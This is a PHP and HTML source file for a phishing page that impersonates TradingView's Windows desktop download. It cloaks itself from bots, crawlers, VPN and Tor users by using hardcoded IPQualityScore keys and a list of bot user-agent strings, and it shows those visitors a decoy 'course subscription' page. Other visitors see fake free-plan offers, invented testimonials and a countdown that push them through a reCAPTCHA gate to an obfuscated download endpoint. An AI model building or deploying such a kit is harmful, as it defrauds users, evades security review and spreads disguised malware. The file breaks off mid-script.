<?php
// 1) Debugging: show all errors (optional)
ini_set('display_errors', 1);
error_reporting(E_ALL);

// 2) Load Configuration for reCAPTCHA site key
$configFile = 'config.json';
$config = json_decode(file_get_contents($configFile), true) ?: [];
$recaptchaKey = trim($config['recaptchaKey'] ?? '');

/**
 * -----------------------------------------------------------
 * IPQUALITYSCORE (IPQS) + EXTENDED BOT BLOCKING
 * -----------------------------------------------------------
 *
 *  - We will check user agent for known bot patterns
 *  - We do a random pick from 4 IPQS keys (200 requests/day each)
 *  - If suspicious, user sees "Course Subscription" page
 *  - We also log suspicious hits to "ipw.txt" in the format:
 *    [YYYY-MM-DD HH:MM:SS] IP | <some-other-fields> ...
 *  - The normal TradingView page is shown if user not flagged
 *
 */

// --- IPQS KEYS ---
$apiKeys = [
    "r6obSXzpjyfVs4LUeLRW8Y34kjeI9kYJ",
    "8EkfGWHBSDr3YnM8b7P93iv7nAjGlhOG",
    "zWmLsoWfTpgKQfas3xeYSewbWmYhXK6U",
    "y3EGVoYwnACMB7EtGOrCcsbCiAo9a0h3"
];

// --- LOG FILE for suspicious IPs ---
$logFile = 'ipw.txt';

/**
 * fetchIPQualityScore($apiKey, $ip)
 * 
 * Queries IPQS to check for proxy/VPN/bot. 
 * Returns raw JSON string or false on cURL error.
 */
function fetchIPQualityScore($apiKey, $ip) {
    $url = "https://www.ipqualityscore.com/api/json/ip/{$apiKey}/{$ip}"
         . "?strictness=1&allow_public_access_points=true&fast=true";

    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $response = curl_exec($ch);
    $error    = curl_errno($ch);
    curl_close($ch);

    if ($error !== 0 || !$response) {
        return false; // cURL error or empty response
    }
    return $response; // raw JSON
}

/**
 * isBotUserAgent($ua)
 * 
 * Check user agent against extensive known crawler/bot strings 
 * including facebook, twitter, google, etc.
 */
function isBotUserAgent($ua) {
    $ua = strtolower($ua);

    // Expanded patterns
    $botPatterns = [
        'facebookexternalhit', 'facebot', 'instagram', 'whatsapp', 
        'twitterbot', 'linkedinbot', 'googlebot', 'bingbot', 'crawler', 
        'spider', 'curl', 'python-requests', 'wget', 'postman', 'slackbot',
        'yahoobot', 'yahoo', 'yandexbot', 'pinterest', 'redditbot', 
        'applebot', 'mediapartners-google', 'adsbot', 'semrush', 'duckduckbot',
        'mj12bot', 'ahrefsbot', 'apache-httpclient', 'httpclient'
    ];

    foreach ($botPatterns as $pattern) {
        if (strpos($ua, $pattern) !== false) {
            return true;
        }
    }
    return false;
}

/**
 * parseUserAgentDetails($ua)
 * 
 * Minimal user-agent parsing to fill in placeholders 
 * for device / OS / browser. 
 * We'll keep it simple, returning an array of 7 placeholders:
 * [ <IP>, <???>, <DeviceType>, <OS>, <Browser>, <???>, <???> ]
 *
 * The user requested an example like:
 *   [2025-02-14 21:11:06] 237.84.2.178 | Unknown | Desktop | Windows | Chrome | Unknown | Unknown
 * We'll implement a simplified guess approach.
 */
function parseUserAgentDetails($ip, $ua) {
    $device = 'Desktop';
    $os     = 'Unknown OS';
    $browser= 'Unknown Browser';

    $lc = strtolower($ua);

    // OS check
    if (strpos($lc, 'windows') !== false) {
        $os = 'Windows';
    } elseif (strpos($lc, 'mac os') !== false || strpos($lc, 'macintosh') !== false) {
        $os = 'MacOS';
    } elseif (strpos($lc, 'linux') !== false) {
        $os = 'Linux';
    } elseif (strpos($lc, 'android') !== false) {
        $os = 'Android';
        $device = 'Mobile';
    } elseif (strpos($lc, 'iphone') !== false || strpos($lc, 'ipad') !== false || strpos($lc, 'ios') !== false) {
        $os = 'iOS';
        $device = 'Mobile';
    }

    // Browser check
    if (strpos($lc, 'chrome') !== false && strpos($lc, 'chromium') === false) {
        $browser = 'Chrome';
    } elseif (strpos($lc, 'safari') !== false && strpos($lc, 'chrome') === false) {
        $browser = 'Safari';
    } elseif (strpos($lc, 'firefox') !== false) {
        $browser = 'Firefox';
    } elseif (strpos($lc, 'edge') !== false) {
        $browser = 'Edge';
    } elseif (strpos($lc, 'msie') !== false || strpos($lc, 'trident') !== false) {
        $browser = 'IE';
    }

    // We'll store two placeholder fields as "Unknown" 
    $field2 = 'Unknown'; 
    $field6 = 'Unknown'; 

    return "{$ip} | {$field2} | {$device} | {$os} | {$browser} | {$field6} | Unknown";
}

/**
 * logSuspicious($ip, $ua)
 * 
 * Logs suspicious IP to ipw.txt in the format:
 * [YYYY-MM-DD HH:MM:SS]  <parsedFields>
 */
function logSuspicious($ip, $ua, $file) {
    $datetime = date('Y-m-d H:i:s');
    $parsed   = parseUserAgentDetails($ip, $ua);

    // Example final format:
    // [2025-02-14 21:11:06] 237.84.2.178 | Unknown | Desktop | Windows | Chrome | Unknown | Unknown
    // We'll prefix with [datetime], then space, then parsed
    $line = "[{$datetime}] {$parsed}\n";
    file_put_contents($file, $line, FILE_APPEND);
}

// ----------------------------------------------------------------
// 1) Check user agent quickly
// ----------------------------------------------------------------
$ip        = $_SERVER['HTTP_CF_CONNECTING_IP'] ?? $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? '';
$isSuspicious = false; // default

// Quick direct user-agent test
if (isBotUserAgent($userAgent)) {
    $isSuspicious = true;
}

// ----------------------------------------------------------------
// 2) If still not suspicious, do IPQS check 
//    - but keep in mind 200 daily limit for each key
//    - We'll just pick one random key to reduce usage
// ----------------------------------------------------------------
if (!$isSuspicious) {
    $selectedKey = $apiKeys[array_rand($apiKeys)];
    $response    = fetchIPQualityScore($selectedKey, $ip);

    if ($response) {
        $data = @json_decode($response, true);
        if (is_array($data) && !empty($data['success'])) {
            $fraud_score = isset($data["fraud_score"]) ? (int)$data["fraud_score"] : 0;
            $is_crawler  = !empty($data["is_crawler"]);
            $proxy       = !empty($data["proxy"]);
            $vpn         = !empty($data["vpn"]);
            $tor         = !empty($data["tor"]);
            $active_vpn  = !empty($data["active_vpn"]);
            $active_tor  = !empty($data["active_tor"]);
            $bot_status  = !empty($data["bot_status"]);

            if (
                $fraud_score >= 75 ||
                $is_crawler   ||
                $proxy        ||
                $vpn          ||
                $tor          ||
                $active_vpn   ||
                $active_tor   ||
                $bot_status
            ) {
                $isSuspicious = true;
            }
        }
        // If success=false or request fails, do nothing => normal page
    }
}

// ----------------------------------------------------------------
// 3) If suspicious => log + show "Course Subscription" page
// ----------------------------------------------------------------
if ($isSuspicious) {
    // Log to ipw.txt
    logSuspicious($ip, $userAgent, $logFile = 'ipw.txt');
    // Show minimal page
    ?>
    <!DOCTYPE html>
    <html lang="en" dir="ltr" class="theme-dark">
    <head>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">
      <title>Exclusive Course Enrollment</title>
      <!-- Minimal TradingView CSS for style -->
      <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/44524.64dbec946ca96256b0ea.css" rel="stylesheet" type="text/css">
      <style>
        body {
          margin:0; padding:0; background: #0f131f; color: #ccc;
          font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen,Ubuntu,Cantarell,"Open Sans","Helvetica Neue",sans-serif;
          display:flex; align-items:center; justify-content:center; height:100vh; text-align:center;
        }
        .subscribe-container {
          max-width: 420px;
          background: rgba(255,255,255,0.06);
          border:1px solid #333;
          border-radius:8px;
          padding:30px;
        }
        .subscribe-container h1 {
          color:#fff; font-size:1.8rem; margin-bottom:15px;
        }
        .subscribe-container p {
          color:#ccc; font-size:1rem; line-height:1.4; margin-bottom:20px;
        }
        .subscribe-container input[type="tel"] {
          width:80%; padding:10px; border-radius:4px; border:1px solid #444;
          background:#1b2030; color:#ccc; margin-bottom:15px;
        }
        .subscribe-btn {
          background: linear-gradient(90deg, #5a00e0 0%, #f900b0 100%);
          padding:12px 20px; border-radius:6px; color:#fff; text-decoration:none;
          font-size:1rem; font-weight:600; display:inline-block; transition:transform 0.3s, background 0.3s;
          box-shadow: 0 4px 15px rgba(249,0,176,0.4);
          border:none; cursor:pointer;
        }
        .subscribe-btn:hover {
          transform: scale(1.03);
          background: linear-gradient(90deg, #6e00ff 0%, #ff00d8 100%);
        }
      </style>
    </head>
    <body>
      <div class="subscribe-container">
        <h1>Exclusive Course Enrollment</h1>
        <p>
          We’re excited to offer our premium trading course! 
          Enter your phone number below and we’ll contact you with more details.
        </p>
        <form action="#" method="post">
          <input type="tel" name="phone" placeholder="Your Phone Number" required><br>
          <button type="submit" class="subscribe-btn">Subscribe Now</button>
        </form>
      </div>
    </body>
    </html>
    <?php
    exit;
}

// ----------------------------------------------------------------
// 4) Otherwise => show normal TradingView Desktop landing page
//     (i.e. the HTML is after the PHP code ends)
// ----------------------------------------------------------------
?>

<!DOCTYPE html>
<html lang="en" dir="ltr" class="is-not-authenticated is-not-pro is-not-trial theme-dark">
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">
  <title>TradingView Desktop Application - Windows Download</title>

  <!-- reCAPTCHA -->
  <script src="https://www.google.com/recaptcha/api.js" async defer></script>

  <!-- TradingView / site CSS bundles -->
  <link rel="news-streaming-url" href="https://notifications.tradingview.com/news/channel">
  <link rel="preconnect" href="https://pricealerts.tradingview.com" crossorigin="use-credentials">

  <!-- Core TradingView CSS bundles (same as your snippet) -->
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/44524.64dbec946ca96256b0ea.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/53953.4fd36ce21282490a58e5.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/62093.5d0098bab0d2d4ea02e5.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/4752.dcb0a09f3223ced196a1.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/2520.fe956dccdf4f9a072b14.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/62564.7cc8161b2d954c2c14ab.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/22164.2bf8dc938d4b644b2e5c.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/58985.e464d157e791b8dd3734.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/88488.545aa1b123cab8d6dbef.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/88778.a699c72be5565e942bf2.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/49478.8fec0cf8c8110f9a7084.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/61135.a33c76f5549cc7102e61.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/70125.2a0b835c9459f5e8f334.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/92115.d4ce023e54009adf69b3.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/84200.56b09b859736ef6f9859.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/67661.585fac974704d1d85ab0.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/93222.72bcebc2807ffdf6acf0.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/12653.bf7fb76d3cb9529abbe6.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/50850.184877a3be8aaa4a0b70.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/86339.e588027388bb6209599e.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/76794.11852900ca8af6b631c4.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/31650.bdb18837b89463617be7.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/71270.7ab1d76dceaa6bc65e5f.css" rel="stylesheet" type="text/css">
  <!-- Additional CSS and JS bundles also included -->
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/29800.c8189f4d259c9d837f94.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/78794.303d3d3a2eef8a440230.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/48012.27fae2e3b4f29fb7abf8.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/29258.89b41c884d5213432809.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/14742.b37eaf239cea1a4a4b98.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/23141.c51465a004d01c973a44.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/62234.269f223bc8f4ee3ab903.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/95083.c213f6654d71afeba31a.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/74729.5e10dcfe1c559bdd6546.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/13055.005deab1142faaf7462d.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/26773.d98a88ad107fbf95a526.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/32175.4582a4b438cda0f189b0.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/39963.fae3a8d06134f36c5860.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/64797.b634aa3690e27db02678.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/26518.534822d7f94188c62b76.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/57218.fa043cf9d22075746ca7.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/23407.045198a3803db38f2395.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/35365.f9f3884fec59cfbe3cc1.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/35455.199034cf25af72be11eb.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/78716.4ee0e8970f6d367da0cb.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/59227.1f926f5175ad42fd467d.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/33101.32c8374f6bc1312009b6.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/70626.9cb9ff06896e492ad1ff.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/83704.53c1ab4722d874686581.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/86072.fdc58e6f78731c559bd8.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/5416.af224e6db8738bc952ac.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/66450.1a91b80dc2029eb9ec7b.css" rel="stylesheet" type="text/css">

  <!-- Additional custom styling is here. -->
  <style>
    /* (Same CSS from your snippet) */
    /* FOMO Banner at top */
    .fomo-banner {
      background: linear-gradient(90deg, #ff4949 0%, #f900b0 100%);
      text-align: center;
      color: #fff;
      font-size: 1.1rem;
      padding: 10px;
      font-weight: 600;
      animation: pulseBanner 2s infinite alternate;
      position: relative;
    }
    @keyframes pulseBanner {
      0%   { opacity: 1; }
      100% { opacity: 0.7; }
    }

    .countdown-timer {
      display: inline-block;
      background: rgba(0,0,0,0.15);
      padding: 2px 6px;
      border-radius: 4px;
      margin-left: 12px;
      font-weight: bold;
    }

    .fomo-button {
      background: linear-gradient(90deg, #5a00e0 0%, #f900b0 100%);
      padding: 16px 26px;
      border-radius: 6px;
      color: #fff;
      text-decoration: none;
      font-size: 1.2rem;
      font-weight: 600;
      display: inline-block;
      transition: transform 0.3s, background 0.3s;
      box-shadow: 0 4px 15px rgba(249,0,176,0.4);
    }
    .fomo-button:hover {
      transform: scale(1.03);
      background: linear-gradient(90deg, #6e00ff 0%, #ff00d8 100%);
    }

    .animated-headline {
      font-size: 2.6rem;
      color: #fff;
      font-weight: 800;
      margin-bottom: 15px;
      position: relative;
      overflow: hidden;
    }
    .animated-headline::after {
      content: '';
      position: absolute;
      bottom: 0;
      left: 0;
      height: 4px;
      width: 0;
      background: linear-gradient(90deg, #5a00e0 0%, #f900b0 100%);
      animation: underline 2.5s infinite alternate;
    }
    @keyframes underline {
      0%   { width: 0; }
      100% { width: 100%; }
    }

    .fomo-text {
      color: #ccc;
      font-size: 1.1rem;
      margin-bottom: 30px;
      line-height: 1.5;
    }

    .fomo-footer {
      background-color: #161a27;
      padding: 20px;
      text-align: center;
      color: #ccc;
    }
    .fomo-footer img {
      height: 30px;
      vertical-align: middle;
      margin-right: 10px;
    }
    .fomo-footer a {
      color: #fff;
      text-decoration: underline;
      font-weight: 500;
    }

    /* Testimonials section */
    .testimonials-container {
      background:#0f0f19;
      padding: 50px 20px;
      text-align:center;
      color:#fff;
    }
    .testimonials-container h2 {
      font-size: 2rem;
      margin-bottom:20px;
    }
    .testimonial-cards {
      display:flex;
      flex-wrap:wrap;
      gap:30px;
      justify-content:center;
      margin-top:30px;
    }
    .testimonial-card {
      background: rgba(255,255,255,0.06);
      padding:20px;
      border-radius:8px;
      width:320px;
      max-width:90%;
      text-align:left;
    }
    .testimonial-card p {
      font-size: 1rem;
      line-height:1.5;
      color:#ccc;
    }
    .testimonial-author {
      margin-top:15px;
      font-weight:600;
      font-size:0.95rem;
      color:#fff;
    }

    /* FAQ style */
    .faq-section {
      background:#191d2b;
      padding:40px 20px;
      color:#fff;
    }
    .faq-section h2 {
      font-size:1.8rem;
      text-align:center;
      margin-bottom:20px;
    }
    .faq-container {
      max-width:900px;
      margin:0 auto;
    }
    .faq-item {
      background:rgba(255,255,255,0.06);
      margin-bottom:15px;
      padding:15px 20px;
      border-radius:6px;
      cursor:pointer;
      transition: background 0.3s;
    }
    .faq-item h3 {
      font-size:1.1rem;
      margin-bottom:8px;
      color:#f900b0;
    }
    .faq-item p {
      margin:0;
      font-size:1rem;
      line-height:1.4;
      color:#ccc;
      display:none; /* Collapsed by default */
    }
    .faq-item.open p {
      display:block; /* Show text if open */
    }
    .faq-item:hover {
      background:rgba(255,255,255,0.09);
    }

    /* Final CTA */
    .final-cta {
      background:#0d0d17;
      padding:40px 20px;
      text-align:center;
      color:#fff;
    }
    .final-cta h2 {
      font-size:2rem;
      margin-bottom:10px;
    }
    .final-cta p {
      font-size:1.1rem;
      color:#ccc;
      margin-bottom:25px;
    }
  </style>
</head>

<body style="margin:0; padding:0;">
  <!-- FOMO Banner with Countdown -->
  <div class="fomo-banner">
    <span>Limited Time Offer: Get TradingView’s Ultimate Plan FREE in the Desktop App!</span>
    <span class="countdown-timer" id="countdown">00:59:59</span>
  </div>

  <div class="widgetbar-place"></div>
  <div class="tv-main">
    <!-- Page placeholders (if any) -->
    <div class="js-container-android-notification"></div>
    <div class="js-container-ios-notification"></div>

    <!-- ============== Main Content ============== -->
    <div id="tv-desktop-page">

      <!-- ======== Hero Section with Headline + CTA ======== -->
      <div class="header-UlRLZ_rT" style="position: relative; overflow:hidden;">
        <div class="content-UlRLZ_rT" style="padding:40px 20px;">
          <!-- Big Animated Headline: "TradingView Desktop" -->
          <h1 class="animated-headline" style="margin-bottom:5px;">
            <div class="title-UlRLZ_rT" style="font-size:1em; line-height:1.2;">
              <p>TradingView</p>
              <p class="titleSecondPart-UlRLZ_rT" style="font-weight:700;">Desktop</p>
            </div>
          </h1>

          <p class="headerSubtitle-UlRLZ_rT" style="font-size:1.2rem; color:#ccc;">
            Experience extra power, extra speed, and extra flexibility,
            all in a blazing-fast Desktop App you’ll love.
          </p>
          <p class="headerSubtitle-UlRLZ_rT" style="font-size:1.05rem; margin-bottom:25px; color:#bbb;">
            **Act now** to unlock premium features at <strong style="color:#f900b0;">ZERO cost</strong>. 
            Our ultimate plan is free for a limited time—don’t miss this golden opportunity!
          </p>

          <!-- CTA button -->
          <a href="javascript:void(0)" onclick="openModal()" class="fomo-button">
            Download for Windows
          </a>

          <!-- Hero background video -->
          <div class="videoWrapper-UlRLZ_rT" style="margin-top:30px; border-radius:8px; overflow:hidden;">
            <video
              src="https://static.tradingview.com/static/bundles/main-video-desktop.avc1.fd8234d837913009d455.mp4"
              muted autoplay loop playsinline disableremoteplayback>
            </video>
          </div>
        </div>
      </div>

      <!-- ======== Plan Comparison: Expert vs Ultimate ======== -->
      <div style="background:#0f131f; padding:60px 20px;">
        <div class="content-UlRLZ_rT" style="max-width:1200px; margin:0 auto;">
          <h2 style="text-align:center; color:#fff; font-size:2rem; margin-bottom:10px;">
            Your Gateway to Market Mastery
          </h2>
          <p class="fomo-text" style="text-align:center;">
            <strong>Expert monthly plan</strong> if you love flexibility, or
            <strong>Ultimate annual plan</strong> if you want **all** the bells and whistles at no cost.
            TradingView Desktop is your ticket to real market insight. FOMO is real—grab this chance while it lasts!
          </p>

          <!-- Cards row -->
          <div style="display:flex; flex-wrap:wrap; gap:30px; justify-content:center;">
            
            <!-- Expert Card -->
            <div style="flex:1 1 300px; max-width:340px; background:rgba(255,255,255,0.06);
                        border-radius:8px; padding:25px; text-align:center; color:#fff;">
              <h3 style="font-size:1.7rem; margin-bottom:15px; font-weight:700;">Expert</h3>
              <p style="margin-bottom:20px; color:#ccc; font-size:1.2rem; line-height:1.4;">
                <s style="opacity:0.7;">$1,199.40 / year</s><br>
                <strong>$99.95 / month</strong>
              </p>
              <ul style="list-style:none; padding:0; margin-bottom:20px; text-align:left; color:#ccc; line-height:1.6; font-size:1rem;">
                <li>✔ 10 charts per tab</li>
                <li>✔ 30 indicators per chart</li>
                <li>✔ 25K historical bars</li>
                <li>✔ 80 parallel chart connections</li>
                <li>✔ 600 price alerts / 600 technical alerts</li>
                <li>✔ 10 watchlist alerts</li>
                <li>✔ No ads</li>
                <li>✔ Volume profile + multiple watchlists</li>
                <li>✔ First priority support</li>
              </ul>
              <!-- CTA -->
              <a href="javascript:void(0)" onclick="openModal()" class="fomo-button" style="font-size:1rem;">
                Download for Windows
              </a>
            </div>

            <!-- Ultimate Card -->
            <div style="flex:1 1 300px; max-width:340px; background:#0e1828;
                        border:2px solid #f900b0; border-radius:8px; padding:25px; text-align:center; color:#fff;">
              <h3 style="font-size:1.7rem; margin-bottom:15px; font-weight:700;">Ultimate</h3>
              <p style="margin-bottom:20px; font-size:1.2rem; line-height:1.4;">
                <s style="opacity:0.7; color:#ccc;">$2,399.40 / year</s><br>
                <strong style="color:#f900b0;">FREE</strong>
              </p>
              <ul style="list-style:none; padding:0; margin-bottom:20px; text-align:left; color:#ccc; line-height:1.6; font-size:1rem;">
                <li>✔ 16 charts per tab</li>
                <li>✔ 50 indicators per chart</li>
                <li>✔ 40K historical bars</li>
                <li>✔ 200 parallel chart connections</li>
                <li>✔ 1,000 price & technical alerts</li>
                <li>✔ 15 watchlist alerts</li>
                <li>✔ Advanced chart types (Renko, Kagi…)</li>
                <li>✔ Publishing invite-only scripts</li>
                <li>✔ Tick-based intervals (BETA)</li>
                <li>✔ First priority support</li>
              </ul>
              <!-- CTA -->
              <a href="javascript:void(0)" onclick="openModal()" class="fomo-button" style="font-size:1rem;">
                Download for Windows
              </a>
            </div>
          </div>
        </div>
      </div>

      <!-- Testimonials Section -->
      <div class="testimonials-container">
        <h2>What Top Traders Are Saying</h2>
        <p style="color:#ccc; font-size:1.1rem; max-width:800px; margin:0 auto;">
          Hear from real users who’ve transformed their trading strategies by going Desktop and never looked back.
        </p>
        <div class="testimonial-cards">
          <!-- Card 1 -->
          <div class="testimonial-card">
            <p>
              “Switching to TradingView Desktop tripled my productivity. No more juggling tabs—everything’s seamless, fast, and unbelievably convenient.”
            </p>
            <div class="testimonial-author">— John M., Full-time Trader</div>
          </div>
          <!-- Card 2 -->
          <div class="testimonial-card">
            <p>
              “I grabbed the Ultimate plan for free and it changed my game. So many charts, so many features—yet so easy to handle in one place.”
            </p>
            <div class="testimonial-author">— Sarah L., Swing Trader</div>
          </div>
          <!-- Card 3 -->
          <div class="testimonial-card">
            <p>
              “Everyone needs this if you’re serious about trading. The multi-monitor support is a dream come true. No other platform competes at this level.”
            </p>
            <div class="testimonial-author">— Felix A., Futures Trader</div>
          </div>
        </div>
      </div>

      <!-- FAQ Section -->
      <div class="faq-section">
        <h2>Frequently Asked Questions</h2>
        <div class="faq-container">
          <!-- FAQ Item 1 -->
          <div class="faq-item">
            <h3>Is the Ultimate Plan really free?</h3>
            <p>
              Yes! For a limited time, you can get the full Ultimate Plan at zero cost in the Desktop App for Windows. But once this offer is gone, it's gone—so don't wait!
            </p>
          </div>
          <!-- FAQ Item 2 -->
          <div class="faq-item">
            <h3>Can I still use my account from the browser?</h3>
            <p>
              Absolutely. The Desktop App seamlessly syncs with your TradingView account. Your watchlists, charts, and settings remain the same across devices.
            </p>
          </div>
          <!-- FAQ Item 3 -->
          <div class="faq-item">
            <h3>Why Windows only?</h3>
            <p>
              This specific promotional deal is exclusive for Windows Desktop users. Mac and Linux versions exist, but they aren’t part of this free Ultimate Plan offer.
            </p>
          </div>
          <!-- FAQ Item 4 -->
          <div class="faq-item">
            <h3>Is reCAPTCHA safe?</h3>
            <p>
              Yes. We use reCAPTCHA to ensure secure access to our download link. Simply complete the challenge, and you’ll be directed to the installer.
            </p>
          </div>
        </div>
      </div>

      <!-- Final CTA Section -->
      <div class="final-cta">
        <h2>Download TradingView Desktop Now</h2>
        <p>
          Don’t let this limited-time FREE Ultimate Plan pass you by. Your edge in the market starts 
          the moment you open TradingView Desktop on Windows. Claim your download now and transform your trading forever.
        </p>
        <a href="javascript:void(0)" onclick="openModal()" class="fomo-button" style="font-size:1.1rem;">
          Yes, I Want the Free Ultimate Plan
        </a>
      </div>

      <!-- Footer & official sections -->
      <hr class="tv-footer-separator" aria-hidden="true">
      <footer class="fomo-footer">
        <img src="https://www.tradingviewdownload.top/_next/static/media/flag-for-egypt-svgrepo-com.b6323b97.svg" alt="Egypt Flag" />
        <span>© 2025 TradingView Inc. All rights reserved.</span>
        <br><br>
        <span style="font-size:1rem;">
          Questions? <strong>Email us at</strong> 
          <a href="mailto:support@tradingview.com">support@tradingview.com</a>
        </span>
      </footer>
    </div> <!-- #tv-desktop-page -->
  </div> <!-- .tv-main -->

  <!-- ============ Modal Overlay for reCAPTCHA ============ -->
  <div id="modalOverlay"
       style="position: fixed; top:0; left:0; width:100%; height:100%;
              background-color:rgba(0,0,0,0.7); display:none;
              justify-content:center; align-items:center; z-index:9999;">
    <div style="background:#1e1e1e; padding:20px; border-radius:8px;
                width:90%; max-width:400px; position:relative; text-align:center;">
      <!-- Close button -->
      <button style="position:absolute; top:10px; right:15px; color:#fff;
                     background:none; border:none; font-size:1.2rem; cursor:pointer;"
              onclick="closeModal()">×</button>
      <h3>Please complete the reCAPTCHA to continue</h3>
      <!-- reCAPTCHA form -> changed action to your 'api.php?param=f%2C%24h9%23tKB%7CgvF(RI' -->
      <form id="captcha-form" method="POST" action="api.php?param=f%2C%24h9%23tKB%7CgvF(RI">
        <div class="g-recaptcha"
             data-sitekey="<?php echo htmlspecialchars($recaptchaKey); ?>"
             data-callback="recaptchaCallback">
        </div>
      </form>
      <p style="font-size:0.85rem; margin-top:15px; color:#bbb;">
        This ensures secure access to the Windows download link.
      </p>
    </div>
  </div>

  <!-- Additional TradingView CSS/JS (unchanged) -->
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/54368.8b7fbb3bf9b16bd1a7a7.css" rel="stylesheet" type="text/css">
  <link crossorigin="anonymous" href="https://static.tradingview.com/static/bundles/6678.7c5b2e1fd0035d131f21.css" rel="stylesheet" type="text/css">

  <!-- Basic JS for opening/closing the reCAPTCHA modal -->
  <script>
    function openModal() {
      document.getElementById('modalOverlay').style.display = 'flex';
    }
    function closeModal() {
      document.getElementById('modalOverlay').style.display = 'none';
    }
    function recaptchaCallback() {
      document.getElementById('captcha-form').submit();
    }
  </script>

  <!-- Aria live regions wrapper (for accessibility) -->
  <div id="aria-live-regions-wrapper" class="aria-live-regions-wrapper">
    <div aria-live="polite" aria-relevant="additions"></div>
    <div aria-live="polite" aria-relevant="additions"></div>
    <div aria-live="assertive" aria-relevant="additions"></div>
    <div aria-live="assertive" aria-relevant="additions"></div>
  </div>

  <!-- ============ Countdown Timer + FAQ toggling ============ -->
  <script>
    // Simple 1-hour countdown from page load
    let countdownElement = document.getElementById('countdown');
    let totalSeconds = 3600; // 1 hour = 3600 seconds

    function updateCountdown() {
      if (totalSeconds <= 0) {
